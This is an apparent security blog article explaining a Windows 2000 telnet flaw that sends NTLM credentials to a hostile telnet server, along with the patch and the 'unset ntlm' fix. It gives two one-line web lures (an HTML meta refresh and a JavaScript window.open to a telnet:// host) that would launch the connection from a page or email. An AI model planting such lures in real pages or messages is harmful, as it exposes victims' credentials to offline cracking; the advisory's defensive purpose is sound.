Real-time AntiSpam protection, automated and self-managed content filtering
Black Green Blue Red Gold
RSS
  • Home PageHome
  • About
  • Downloads
  • Store
  • Support
  • Contact

Windows Authentication Exposes Telnet

Net Progress Add comments
Telnet, the mainstay of remote management for decades, got a feature enhancement in Windows 2000 that might streamline the logon process, but could also expose user authentication credentials to a hacker. Microsoft has recently released a patch that eliminates a security vulnerability in Windows 2000 telnet client. The bug could allow a malicious user to trick an unsuspecting victim into automatically starting a telnet session with the hacker's telnet server, thereby transmitting critical user authentication information to that server. With the help of KeyLabs, BugNet was able to reproduce this bug that affects all Windows 2000 users. The vulnerability occurs because of a new authentication feature added to Windows 2000's telnet.exe. The feature lets telnet automatically authenticate with NTLM-enabled telnet servers (i.e. Windows 2000 Telnet

Servers). NTLM is the standard authentication used by Windows products. It uses a challenge/response mechanism to confirm a user's identity without sending the password across the wire. Telnet or not to telnet? The problem is that NTLM authentication happens automatically and by default whenever telnet is launched. So if a malicious user could entice a victim into initiating a telnet session with a tricked server, then the malicious user could capture the victim's authentication credentials. Capturing the credentials by itself does not put the victim's computer at risk, nor does it allow the hacker to gain access to the victim's computer. It does, however, give the hacker enough information to launch an off-line brute force attack aimed at ascertaining the plain-text password. Because this attack is handled off-line, the user and the system administrator are none the wiser, and the malicious user could take as much time as needed to get the password. This begs the question, how might a malicious user entice a victim into establishing a remote telnet session? The answer is quite simple. Because pretty much all versions of Internet Explorer and Outlook will launch telnet when they encounter "telnet://hostname" in a carefully constructed HTML reference, the malicious user would only have to create a reference on a web page or in an e-mail message. The referenced command could be as simple as: <meta http-equiv="refresh" content="0;URL=telnet://hostname"> Or, if you prefer JavaScript: <script>window.open("telnet://target")</script> Despite the insidiousness of this vulnerability, there are some simple solutions. First, you can install the Microsoft patch. The fix is small and makes for a quick download. Install the patch by running the downloaded executable. No other user intervention is required, except for the mandatory system restart. So when installing the patch on a server, wait until restarting the server will have the least impact on the users. Unlike Windows 9x and Windows NT, Windows 2000 is the only version that has this problem. Once installed, the patch will warn the user whenever telnet tries to authenticate outside the "Trusted sites" or the "Local Intranet" zones. The warning reads like this: "You are about send your password information to a remote computer in the Internet zone. This might be unsafe. Do you want to send anyway(y/n):" The second method for protecting a Windows 2000 system running telnet.exe involves disabling NTLM authentication on the telnet client. A Microsoft security bulletin on this vulnerability explains how to disable all NTLM telnet authentications. Issuing the command "unset ntlm" from the telnet command line will prevent telnet from automatically authenticating via NTLM. To check the status of telnet authentication, enter the command "display" from the telnet command prompt. If the "Not Auth (NTLM)" is displayed, then Microsoft's challenge/response is turned off. Telnet has been around for a while. With some companies, telnet is the primary tool for managing network devices like servers and routers. Based on our test, BugNet recommends that all Windows 2000 users consider installing this patch.

August 18th, 2009  
Tags: hacker, NTLM, NTLM-enabled telnet servers, Windows Authentication, Windows Authentication Exposes Telnet

Leave a Reply

  • Menu

    • About
    • Contact
    • Downloads
      • List Servers and SMTP Servers
      • Small Business
      • Veriat Enterprise
    • Store
    • Support
  • Categories

    • Anti-Comment Spam Tactics
    • Anti-spam appliances
    • Anti-spam techniques
    • Bug fixing
    • Bug Info
    • Comments
    • Digital Signature
    • Net Progress
    • News
    • Review
    • Spam Facts
    • Spam filtering techniques
    • Spam wars
    • Uncategorized
  • Archives

    • May 2010
    • December 2009
    • November 2009
    • October 2009
    • September 2009
    • August 2009
    • July 2009
    • June 2009
    • April 2009
  • Tags

    abusive templates America Online anti spam antispam Anti Spam Web BugNet Data Protection Data Protection Agency Digital ID e-mail e-mails email FTP gold spammers Groupware groupware system hacker Internet Internet Explorer Internet providers Internet service Internet Users Intranet Intranet bets pay off Intranets Rescue Reengineering junk mail LDAP LotRO macro Microsoft NDS NetBIOS Netscape Java Hole Netscape Navigator operating system QuitaSpam spam spammer spammers spam messages spyware Veriat Digital ID Water Windows 95 World of Warcraft
  •  

    July 2010
    M T W T F S S
    « May    
     1234
    567891011
    12131415161718
    19202122232425
    262728293031  
  • Blogroll

    • Call Center
    • Direct Buy
    • free software download
    • Internet Security
    • joomla templates
    • Laser Hair Removal
    • ovulation calendar
    • Technical Schools
    • Word to PDF
    • zero emission vehicle
Categories
  • Anti-Comment Spam Tactics
  • Anti-spam appliances
  • Anti-spam techniques
  • Bug fixing
  • Bug Info
  • Comments
  • Digital Signature
  • Net Progress
  • News
  • Review
  • Spam Facts
  • Spam filtering techniques
  • Spam wars
  • Uncategorized

A Veriat Digital ID establishes your identity to others that you communicate with. Digital IDs contain a unique digital code which can be used to verify your digital signature or encrypt messages.Read more

Copyright © 2010 Real-time AntiSpam protection, automated and self-managed content filtering All Rights Reserved XHTML CSS